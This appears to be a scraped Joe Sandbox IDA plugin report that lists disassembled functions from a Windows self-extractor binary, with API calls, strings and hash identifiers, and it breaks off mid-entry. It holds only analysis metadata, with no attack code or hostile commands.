Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 4146474141-0
Opcode ID: c4c6f2645e1b96947871e3855a4fc841a8b729d484be1055ea2a0a3ad07fc35f
Instruction ID: c739b55adc4babb88fe741c80129b540444c3db086f1027a464c67691b66768b
Opcode Fuzzy Hash: c4c6f2645e1b96947871e3855a4fc841a8b729d484be1055ea2a0a3ad07fc35f
Instruction Fuzzy Hash: EE2175B294410CBEEB159FA0DC85DEB7BACEB04394F10807BF905D6190EA34AE54DBA5

Function 004027BC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 275comCOMMON

Download Yara Rule

APIs

_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 004027D7
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00402877
_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?), ref: 00402932
CoCreateInstance.OLE32(0041E900,00000000,00000001,0041E8D0,?,.lnk,?), ref: 004029DB

Strings

.lnk, xrefs: 004029BA

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 3412909311-24824748
Opcode ID: 59ca3bc934bfe5524fd71030fef388c7fb6b0ecd844532260d109d37369cbdbc
Instruction ID: f710f02e0929a294d06bc30e2871665e4811290be6e082897783be63a7fbe6f3
Opcode Fuzzy Hash: 59ca3bc934bfe5524fd71030fef388c7fb6b0ecd844532260d109d37369cbdbc
Instruction Fuzzy Hash: 25A17C76900209AFDB14EBA1CD89AEE77B9EF04304F10443EF505B61E1EB79AD52DB18

Function 00406747 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00406756
SetWindowsHookExW.USER32(00000007,Function_000075F2,00000000,00000000), ref: 00406766
GetCurrentThreadId.KERNEL32 ref: 0040677A
SetWindowsHookExW.USER32(00000002,Function_000075C3,00000000,00000000), ref: 0040678A
EndDialog.USER32(?,00000000), ref: 004067B5

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 2c775c8deca40f438bef2d2cbe565d8ac4cf06de5fd7fe09e23dca1ec634e25c
Instruction ID: 25a4db72bee226b3d1d669d7668e4e2c4ea3b9f7c17e18db64053bbd3cc309ad
Opcode Fuzzy Hash: 2c775c8deca40f438bef2d2cbe565d8ac4cf06de5fd7fe09e23dca1ec634e25c
Instruction Fuzzy Hash: FCF03C74A80320EFE7209B90EC89BA576A4A758705F50807BE607D15F1CBB819D1DF5E

Function 00411D80 Relevance: 5.7, Strings: 3, Instructions: 1949COMMON

Download Yara Rule

Strings

[6A, xrefs: 0041326E
[6A, xrefs: 00411D86
[6A, xrefs: 0041289B, 00413263, 00411E6D, 0041221B, 00412324, 004123AB, 00412427, 004124AE, 0041252D, 004125A8, 00411F44, 00411FA2, 0041200B, 00412064, 004120D3, 00412132, 0041219A, 00412CF8, 00412D59, 0041305C, 004130CC, 0041319B, 00412F24, 00412B14, 00412B73, 00412979, 004129D8, 00412713

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID: [6A$[6A$[6A
API String ID: 0-2956743508
Opcode ID: 302932b089df34dade02cb092ad0424b9b2189065354e33b2688753d6745557a
Instruction ID: ab9a170a832cc4644c16837fa02db854190e54fda33e4070c35fc96ce6bc9187
Opcode Fuzzy Hash: 302932b089df34dade02cb092ad0424b9b2189065354e33b2688753d6745557a
Instruction Fuzzy Hash: BDF22172F101298FCB18CFADC9806ACBBF1FF49341F15426AE855E7384E6789A52CB54

Function 004150AE Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

g\A, xrefs: 004150B5
g\A, xrefs: 00415125, 00415255, 0041518E
g\A, xrefs: 004150B6, 004151A9, 0041522F, 004151FF, 0041523D, 0041523F

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID: g\A$g\A$g\A
API String ID: 0-541483765
Opcode ID: 0506bd1424bbf784d0aa033c801f942a4681b14449226da892feb2b050152ce0
Instruction ID: 52fda566a3b8c3631fdaaf90d589631f16f8e6362a90c72a2b53d4c11cc329a8
Opcode Fuzzy Hash: 0506bd1424bbf784d0aa033c801f942a4681b14449226da892feb2b050152ce0
Instruction Fuzzy Hash: CA616D79900646DFCB15CF6CC4809EAFBF1FF49304B19819EE895DB341E639A982CB94

Function 0041B0EF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001B0FB,0041A916), ref: 0041B0F4

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1561773e955de58207edc186e1e6ac9a6a1f4d3db6c42ee5d93cea4427833907
Instruction ID: 8253ac15410e5078740fa1fe0e8c6fd17a7701e4542fa8e97002f3b533f6e886
Opcode Fuzzy Hash: 1561773e955de58207edc186e1e6ac9a6a1f4d3db6c42ee5d93cea4427833907
Instruction Fuzzy Hash:

Function 0040AD0B Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05532998844e7b030d05f987acda7d9849a42490bb64f13068762cae89e512d
Instruction ID: 9125a28887f914b34898282b5ce049272f06258eac328e5c2ed0f1af334f46a0
Opcode Fuzzy Hash: b05532998844e7b030d05f987acda7d9849a42490bb64f13068762cae89e512d
Instruction Fuzzy Hash: B4221B70D00209DFCB54DFA5C891AEEBBB5FF49304F14407EE819AB292DB349991CB99

Function 0041379E Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02236ddf882897b580785ade712133ff623eea36b25cfe5c8e0816d706c58b19
Instruction ID: 24fa9bf714c8220c19a98afc1d6ecaddeb96014b9e166ffe1d082dc6119362ae
Opcode Fuzzy Hash: 02236ddf882897b580785ade712133ff623eea36b25cfe5c8e0816d706c58b19
Instruction Fuzzy Hash: 47029372F001258FDF04DF2CC5806BC7BE2BB85386F15466AE856DB684E674DAC1CB98

Function 00416762 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: abbbafb52c4abf6081ed23f1211f37930a1bb8efdbac0bee7b5df1a2fd2eee22
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: BF9188732090A30ADB29463D84741BFFFE15A523A131B079FD4F2CB2C1EE28D5A5D628

Function 00416A1D Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 0b36473d0712a21fdf89b137d858effbed85754ad67a9f04cd7f4fa31729b161
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0191667220C0B349DB29463E857407EFFE19A523A131B079FD4F2CA2C5FE28D5A5D628

Function 0041649B Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 3919f0c0b4ed48f5fdfdf519e3289d93c7d44d05ebf107192a81baae38b14441
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0C9176722090A34ADB29463D95341BFFFE25A523A131B07AFD4F2CA2C5FE18D594D628

Function 004161F1 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 00db7f54c09d4e664a4bf92c29ccc8306fbb410a0adc9c6b6dccdf960f9bfe78
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 348187322090A309DB29467E85740BFFFE15A513A131B079FD8F2CA2C5EE28D5A5D628

Function 0040F5E4 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47b6b61b08ce3bb09ad3ec551afcaaffae0c41babd603749b70cf29f27586135
Instruction ID: a2e31cdffff1626e7d08452a7a433821ff73a9c8a6d8c3f39eaf252be9dd3ae2
Opcode Fuzzy Hash: 47b6b61b08ce3bb09ad3ec551afcaaffae0c41babd603749b70cf29f27586135
Instruction Fuzzy Hash: 244146327006068FDB38CD2D88902AE77E2ABC5310B18C93ED997D7B81C679D90BC754

Function 0041B853 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d674c0f84ac3acb2b9102cbad2f79c786f2052c1b9f45c1f7008a0fde2fa4379
Instruction ID: 677ed473426cf704e373d8e1267a7361b0a7c1101c1b60bf36363dd32c9be67b
Opcode Fuzzy Hash: d674c0f84ac3acb2b9102cbad2f79c786f2052c1b9f45c1f7008a0fde2fa4379
Instruction Fuzzy Hash: 2C41B4A1C14F9652E7134F3CC842272B320BFAF208F10D76AFDD179963EB3265456655

Function 0041B4E1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73dd1a86799d80143cbbdbaeda274d707130190cc5d70280a0d1a6d18b079393
Instruction ID: 538e2535fe5236040a793564842bbb27ccd2f55bc3446ca11cf4f57ac25525bf
Opcode Fuzzy Hash: 73dd1a86799d80143cbbdbaeda274d707130190cc5d70280a0d1a6d18b079393
Instruction Fuzzy Hash: AA21C8329006255BC702DE6EE4845A7F392FBC432AF574727ED8463290C738B854C6D0

Function 0041B5BB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
Instruction ID: 9d1bbcbc2298e9365e84d9c336a4d420a1c96383be17cd375720e82858c43ccf
Opcode Fuzzy Hash: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
Instruction Fuzzy Hash: E02107725104259BC702DF1DE4886B7B3E1FFE8319F578A2BD98187280C728E845D6E5

Function 004048E2 Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041D424), ref: 0040497F
_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00404A6B
_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00404A85

Strings

ExtractPathTitle, xrefs: 00404A8E
GUIMode, xrefs: 00404997
OverwriteMode, xrefs: 004049BB
CancelPrompt, xrefs: 00404AC0
ErrorTitle, xrefs: 0040492D
MiscFlags, xrefs: 00404A09, 00404A0E, 00404A25
ExtractCancelText, xrefs: 00404A33
Progress, xrefs: 0040495F
GUIFlags, xrefs: 004049D9, 004049DE, 004049F5
ExtractPathText, xrefs: 00404AA4
Title, xrefs: 004048EB
ExtractPathWidth, xrefs: 00404A74
X_, xrefs: 00404A98, 00404AA9
ExtractTitle, xrefs: 00404943
ExtractDialogText, xrefs: 00404A3E
ExtractDialogWidth, xrefs: 00404A4E

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _wtol$lstrcmpi
String ID: X_$CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title
API String ID: 2897064186-2034584860
Opcode ID: ac5839555febace94c4951e1d5288340f9c3ac755999470eb86307af12c43a60
Instruction ID: 1e4182120db62a9ca66f94633a58cadc7bff0e04447debb8327e4c204bd28926
Opcode Fuzzy Hash: ac5839555febace94c4951e1d5288340f9c3ac755999470eb86307af12c43a60
Instruction Fuzzy Hash: A55188B1B50314BEEB14AF75AC829BA37DCDA90759750047FF802E32E1EA3C9E414A5C

Function 004061CD Relevance: 33.2, APIs: 22, Instructions: 237windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065), ref: 004061F0
LoadIconW.USER32(00000000), ref: 004061F7
GetSystemMetrics.USER32(00000032), ref: 00406209
GetSystemMetrics.USER32(00000031), ref: 0040620E
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00406217
LoadImageW.USER32(00000000), ref: 0040621E
SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040623C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00406249

Part of subcall function 00406CD5: GetDlgItem.USER32(?,?), ref: 00406CE1
Part of subcall function 00406CD5: GetWindowTextLengthW.USER32(00000000), ref: 00406CE8
Part of subcall function 00406CD5: GetDlgItem.USER32(?,?), ref: 00406CFB

Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474

Part of subcall function 00406EA2: GetDlgItem.USER32(?,000004B3), ref: 00406EB8
Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406ECA
Part of subcall function 00406EA2: GetDlgItem.USER32(?,000004B4), ref: 00406ED4
Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406EE0
Part of subcall function 00406EA2: SendMessageW.USER32(?,00000401,?,00000000), ref: 00406EEF
Part of subcall function 00406EA2: GetDlgItem.USER32(?,?), ref: 00406EF7
Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00406F03
Part of subcall function 00406EA2: GetDlgItem.USER32(?,?), ref: 00406F0B
Part of subcall function 00406EA2: SetFocus.USER32(00000000,?,?,00406351,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00406F0E

Part of subcall function 00403C7A: SetWindowTextW.USER32(?,?), ref: 00403CDB

GetDlgItem.USER32(?,000004B2), ref: 00406265
GetDlgItem.USER32(?,000004B2), ref: 00406271
GetWindowLongW.USER32(00000000,000000F0), ref: 00406278
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040628D
GetDlgItem.USER32(?,000004B5), ref: 0040629A
GetDlgItem.USER32(?,000004B5), ref: 004062AA
GetWindowLongW.USER32(00000000,000000F0), ref: 004062B5
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004062C4
GetDlgItem.USER32(?,000004B2), ref: 004062DA
GetWindow.USER32(?,00000005), ref: 004063BF
GetModuleHandleW.KERNEL32(00000000,00000065,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00406417
LoadIconW.USER32(00000000), ref: 0040641E
GetDlgItem.USER32(?,000004B1), ref: 0040643D
SendMessageW.USER32(00000000), ref: 00406440

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$Window$MessageSend$Long$HandleLoadModule$IconMetricsSystemText$FocusImageLengthShow
String ID:
API String ID: 3785092128-0
Opcode ID: d5e754e4d832721f135e77653f759062296c8a889b20557d9a6ddaaf3763c7c2
Instruction ID: d7e90aafd0e757e10d18d202e7566f7fcdfea5f1456dc0a3d86f09484e5ac7e1
Opcode Fuzzy Hash: d5e754e4d832721f135e77653f759062296c8a889b20557d9a6ddaaf3763c7c2
Instruction Fuzzy Hash: E571F9717843006BFB246F65DD8AF6A3659EB44714F15413AFA03BE2E2CABCDC108A5D

Function 004067C5 Relevance: 27.3, APIs: 18, Instructions: 299COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 004067E8
GetWindowLongW.USER32(00000000,000000F0), ref: 004067F1
GetDlgItem.USER32(?,000004B4), ref: 00406834
GetWindowLongW.USER32(00000000,000000F0), ref: 0040683D
GetSystemMetrics.USER32(00000010), ref: 004068C6
GetSystemMetrics.USER32(00000011), ref: 004068CC
GetSystemMetrics.USER32(00000008), ref: 004068D2
GetSystemMetrics.USER32(00000007), ref: 004068DD
GetParent.USER32(?), ref: 00406902
GetClientRect.USER32(00000000,?), ref: 00406913
ClientToScreen.USER32(00000000,?), ref: 00406924
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0040698F
GetDlgItem.USER32(?,000004B1), ref: 004069AC
SetWindowPos.USER32(00000000), ref: 004069B3
GetClientRect.USER32(?,?), ref: 00406A20

Part of subcall function 00406F7A: GetDlgItem.USER32(?,00000020), ref: 00406F98
Part of subcall function 00406F7A: SetWindowPos.USER32(00000000,?,00406CCF,?,?,?,?,?,00000000,?,?,75A88FB0,?,?,?,00000020), ref: 00406F9F

ClientToScreen.USER32(00000000,?), ref: 0040692B

Part of subcall function 00405F99: GetDlgItem.USER32(?,?), ref: 00405FA5

GetSystemMetrics.USER32(00000008), ref: 00406AAD
GetSystemMetrics.USER32(00000007), ref: 00406AB4

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
String ID:
API String ID: 2671006076-0
Opcode ID: 03cb1b5039f6c3603e8792d352c54f19f8d0babde2965606c7c46eb8facf6461
Instruction ID: 4ccc2a13dd396f9129f756b70f24ae64c84b461514b1d33740f959704c9e3596
Opcode Fuzzy Hash: 03cb1b5039f6c3603e8792d352c54f19f8d0babde2965606c7c46eb8facf6461
Instruction Fuzzy Hash: 0FA18272E402159FDF10DFA8CD85AAE7BB9EF48710F16416AE901F72C5C678ED018BA4

Function 004064FF Relevance: 25.6, APIs: 17, Instructions: 118windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474

GetDlgItem.USER32(?,000004B8), ref: 00406530
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040653F
